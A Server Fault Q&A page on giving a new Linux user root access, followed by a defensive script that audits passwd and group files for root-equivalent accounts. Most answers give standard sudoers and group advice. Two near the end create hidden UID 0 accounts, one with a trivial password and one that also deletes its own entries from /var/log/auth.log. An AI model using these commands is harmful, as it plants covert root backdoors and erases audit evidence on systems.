32

I want to add a new user and grant that new user all root access. How can I do that?

I did sudo adduser --system testuser but this is not working as I expected.

Thanks for help.

seg.server.fault

8 Answers

63

There are actually three ways you can do this: the right way, the wrong way, and the ugly way.

First, create a normal user account.

adduser username

Then select one of the following:


The Right Way

Create a sudo entry for the wheel group in /etc/sudoers like this:

## Allows people in group wheel to run all commands
%wheel  ALL=(ALL)       ALL

Or for "modern" versions:

## Allows people in group sudoers to run all commands
%sudoers ALL=(ALL)       ALL

Then add the user to the wheel group. Adding and removing users with administrative privileges now becomes a function of remembering to add them to wheel, instead of creating an entry in sudo. The great thing about using wheel is that you can extend this mechanism into other authentication schemes that support groups, i.e. winbind/Active Directory, and reap the benefits in the process. You would accomplish this by mapping wheel to a group in your authentication schema that has admin privileges.

Note that some distributions use different administrative accounts. Wheel is a "traditional" approach to this, but you may encounter admin, adm, and other group accounts that serve the same purpose.

Follow-up Edit:

I have to give a point to Bart Silverstrim for pointing out that Ubuntu uses admin as the group for this purpose. He got to this first, although I didn't notice an Ubuntu tag at the time. Again, it all depends on what distribution you are using.


The Ugly Way

Create a sudo entry for the user account in question and give them complete access. Again, you create the entry in /etc/sudoers like this:

## Allows just user "username" to run all commands as root
username    ALL=(ALL)    ALL

ADDED:

## For Ubuntu version
username    ALL=(ALL:ALL) ALL

This is great if you only have one (or two) normal accounts. It is ugly when you have a hundred accounts over multiple (geophysical) sites and have to constantly maintain the sudo file.


The Wrong Way

You can edit the /etc/passwd file and change the user account ID from whatever number it is, to 0. That's right, zero.

username:x:0:502::/home/username:/bin/bash

See that third entry as zero? When you log into that account, you are, for all effective purposes, root. I do not recommend this. If you do not remember "who" you are, you can create all kinds of havoc as you start creating and touching files as root. You could also add your username to the root group. This has the same effect for file access but it creates other issues; programs will notice you are not user root and refuse to run, but you will gain access to files that belong to group root.

If you did this, you did use vipw instead of just editing with vi, right? (or whatever your favorite text editor is) After all, a single typo in this file can lock you out of your system - and that means a physical visit to the computer in question with a repair disc...

Avery Payne
  • 2
    I would not even document the wrong way. Too taboo. – elcuco Aug 25 '09 at 13:10
  • 15
    I disagree. If you hide the wrong, it doesn't go away, it just festers - and sometimes, the knowledge that something is forbidden attracts more attention than it should. Better to understand *why* it is taboo. Especially when there are (admittedly rare) circumstances where you might need that knowledge. Still, I'll give you a point for pointing out just how really bad things can be. :) – Avery Payne Aug 25 '09 at 13:13
  • 1
    "After all, a single typo in this file can lock you out of your system" - no it won't, it may lock you out after you disconnect all Putty sessions (assuming you use Putty). As long as you don't disconnect, but just open another session to test your settings you are ok in this regard. – quamis Aug 25 '09 at 14:01
  • 1
    @quamis - true. Although I was trying to point out the danger in assuming that it's safe to "fire and forget". :) A point for you too, for pointing out good practice - *always test settings afterwards*. – Avery Payne Aug 25 '09 at 14:10
  • this was very very helpful! – Drewdin May 01 '12 at 18:08
  • 1
    I'd just like to note that what was traditionally 'wheel' group (with binary, flag-level elevation) in Unix is no longer a common term for group of users that can elevate with sudo. From my experience, the most common name of the group of people that can sudo is nowadays typically 'sudoers' and is already set up on most systems. – Bojan Markovic Oct 10 '12 at 13:45
  • Noted, added, and comment bumped. :) – Avery Payne Nov 01 '12 at 18:50
  • Always use visudo when editing sudoers! – Wilshire Nov 01 '12 at 19:41
  • This seems overly complex... isn't it enough to [add the user to the sudo group as in my answer](http://serverfault.com/a/611849/69936)? [200+ upvotes](http://askubuntu.com/questions/7477/how-can-i-add-a-new-user-as-sudoer-using-the-command-line) can't be wrong. – Dan Dascalescu Jul 11 '14 at 09:30
  • @DanDascalescu your answer isn't wrong at all; although the initial question didn't specify *which* system was being modified. It wasn't until later that the question was amended to be Ubuntu. The reason for the extra text is that it explains the *why*. See my comment above about "forbidden knowledge". – Avery Payne Jul 14 '14 at 23:49
  • Also worth pointing out that although Ubuntu has the admin group in the sudoers file that group does not exist by default (on 12.04 at least) so you can't add users to it. You must therefore issue `addgroup admin` before you start adding users to the group. – rnbrady Sep 18 '14 at 10:56
  • @rnbrady understandable, the question dates back to '09 and things change in the interim. This is a common issue with several answers I have seen; over time, the answer becomes "stale" even though the topic is current. – Avery Payne Nov 19 '15 at 23:59
  • 1
    How can I create a user who has all rights without writing sudo? – Nullpointer Sep 08 '16 at 12:12
  • Really nice answer, but **What I need is to create a user with full access to the filesystem** (In my case, even read would be enough, but I'm using sftp, so writing sudo doesn't seem to be an option). Adding my users to admin/sudo groups doesn't allow them to check any content, like /root. **Did I do something Wrong ?** _I'm using Ubuntu 16.04 LTS_ – Balmipour Jan 05 '17 at 10:48
  • @Balmipour, you're going to have some limited options. The obvious ones are to use the root account (which basically bypasses security checks) or to give "other" (world) access to the directories you need. The problem I see is that your user with "full access to the filesystem" is essentially a giant security hole waiting to happen. I'm not sure I could chip in further advice at this point. – Avery Payne Jan 05 '17 at 17:43
  • You're right, but I'm quite surprised that such a simple need is so hard to fulfill. It still looked better than enabling ssh access for root to me. (well, since we got IP restrictions and strong passwords, I doubt it's really an issue, but... I hoped I'd find something better.) I'll do with it. Anyway, thanks for your answers. – Balmipour Jan 05 '17 at 22:35
  • https://unix.stackexchange.com/questions/92123/rsync-all-files-of-remote-machine-over-ssh-without-root-user#comment170839_92397 argues in favour of distinct root accounts if different users require SSH root privileges and distinct shell, home and `.ssh/authorized_keys`. – Derek Mahar Nov 09 '17 at 19:26
3

I've been using this for years and it's the #1 recommended way to add a sudoer on AskUbuntu:

adduser existinguser sudo

Much simpler than editing files, and easy to throw in a shell script for unattended installation.

If you want to create the user and grant sudo privileges, you can do that in one line like this:

useradd newuser -m -G sudo
passwd newuser

-m creates a home directory, and -G specifies a supplementary group.

Dan Dascalescu
2

and with this is 100%:

adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456

and connect with putty and ip server

Scott Pack
hacker-s2h
1

Well, you may create a user with adduser; see man adduser.
Afterwards you can add it to a privileged group like root or wheel. But I think that the most recommended way to have some permissions is using sudo.

Ali Mezgani
1

You can perform:

# useradd -m -g root alex

It creates a user Alex with a home directory who belongs to the root group.

Razique
1

Addition to Avery Payne's answer: in Ubuntu, you may want it like so:

%sudo   ALL=(ALL:ALL) ALL

And not like so:

%sudo    ALL=(ALL) ALL
HBruijn
hukeping
0

The "ugly and messy" way is to edit /etc/passwd to have UID=0 AND GID=0 for the new user. But this poses a LOT of security risks. You do know that if he is also root he may disable your account, change your password, make you a "standard user"... right? So why not just give him your own account?

You may study the way suid (http://en.wikipedia.org/wiki/Setuid) works if you want to grant him root access for just a few of the commands.

quamis
-1

Here's a one liner:

USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here"
&& sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 -- 
non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' 
/var/log/auth.log

Best,

Boschko
  • 1
    Adding additional users with the uid 0 is not a good idea ... see the answer with the most votes for details. – Gerald Schneider Nov 14 '19 at 14:42
  • @GeraldSchneider I never said it was a good idea... I'm well aware... and honestly it's none of our concern. It's a one liner, use it in pentests all the time. Regards – Boschko Nov 14 '19 at 20:47
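
A defender-side check for the root-equivalent accounts the answers above describe: extra UID 0 entries in /etc/passwd, a primary group of root, and membership of the sudo-granting groups. This is an added example, not code from any poster on this page; the function names `audit_passwd` and `audit_groups` and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Audit passwd- and group-format files for root-equivalent accounts.
# File paths are arguments, so copies pulled from a host can be checked.

# "uid0:<name>" = non-root account with UID 0 (the /etc/passwd edit).
# "gid0:<name>" = account whose primary group is GID 0 (useradd -g root).
audit_passwd() {
    awk -F: '
        NF < 4 || $1 == "root" { next }
        $3 ~ /^0+$/ { print "uid0:" $1; next }
        $4 ~ /^0+$/ { print "gid0:" $1 }
    ' "$1"
}

# "<group>:<member>" for each supplementary member of the groups this
# page names as granting root: root, wheel, sudo, sudoers, admin.
audit_groups() {
    awk -F: '
        $1 ~ /^(root|wheel|sudo|sudoers|admin)$/ {
            n = split($4, members, ",")
            for (i = 1; i <= n; i++)
                if (members[i] != "" && members[i] != "root")
                    print $1 ":" members[i]
        }
    ' "$1"
}

# Constructed sample files (not from a real host), reusing names from the page.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
username:x:0:502::/home/username:/bin/bash
alex:x:1001:0::/home/alex:/bin/bash
newuser:x:1002:1002::/home/newuser:/bin/bash
EOF
cat > "$SAMPLE_DIR/group" <<'EOF'
root:x:0:
sudo:x:27:newuser,existinguser
admin:x:110:
users:x:100:alex
EOF

audit_passwd "$SAMPLE_DIR/passwd"
audit_groups "$SAMPLE_DIR/group"
```

On a live system, pass /etc/passwd and /etc/group instead of the sample files; every output line is an account that should have a known owner and reason.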